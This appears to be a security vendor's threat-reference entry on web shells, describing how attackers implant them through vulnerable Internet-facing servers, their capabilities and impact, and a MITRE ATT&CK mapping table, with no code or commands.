Summary
A web shell is a piece of malicious code, often written in typical web development programming languages such as ASP, PHP and JSP, that attackers implant on web servers to provide remote access and code execution to server functions.
To implant web shells, attackers take advantage of security gaps in Internet-facing web servers, typically vulnerabilities in web applications, for example CVE-2019-0604 or CVE-2019-16759. An attacker can identify vulnerabilities that can be exploited by using network reconnaissance tools to be able to install web shell. Once successfully uploaded, the attacker can use the web shell to leverage other exploitation techniques to escalate privileges and issue commands remotely. The commands include the ability to add, delete and execute files as well as the ability to run shell commands, executables or scripts.
The web shells provide the following capabilities after successful installation by attacker:
- Allow attackers to execute commands and steal data from a web server
- Use server as launch pad for further attacks against the affected organization
- Issue commands to hosts inside network without direct Internet access
- Upload additional malware such as Chopper for watering hole attacks and scanning of other victims
Capabilities
- Information Theft
- Backdoor commands
- Exploits
Impact
- Compromise system security - with backdoor capabilities that can execute malicious commands
- Violation of user privacy - gathers user credentials and steals user information
Additional Threat Reference Information
Infection Chain
MITRE ATT&CK Matrix
| BEHAVIOR | TACTIC | TECHNIQUE |
|---|
| Attackers take advantage of security gaps in Internet-facing web servers | Initial Access | T1190: Exploit Public-Facing Application |
| Allow attackers to execute commands from a web server | Execution | T1035: Service Execution |
| Attackers install web shell on misconfigured Internet-facing webserver | Persistence, Privilege Escalation | T1100: Web Shell |
| Compromised accounts are accessed | Credential Access | T1110: Brute Force |
| Attacker can identify vulnerabilities that can be exploited by using network reconnaissance tools | Discovery | T1087: Account Discovery
T1135: Network Share Discovery
T1121: Password Policy Discovery
T1069: Permission Groups Discovery |
| Web shell commands include the ability to add, delete and execute files as well as the ability to run shell commands, executables or scripts | Lateral Movement | T1077: Windows Admin Shares |
| Harvests sensitive data and credentials | Collection | T1119: Automated Collection |
| Gathered information is sent to C&C server of attacker | Exfiltration | T1071: Exfiltration Over Command and Control Channel |
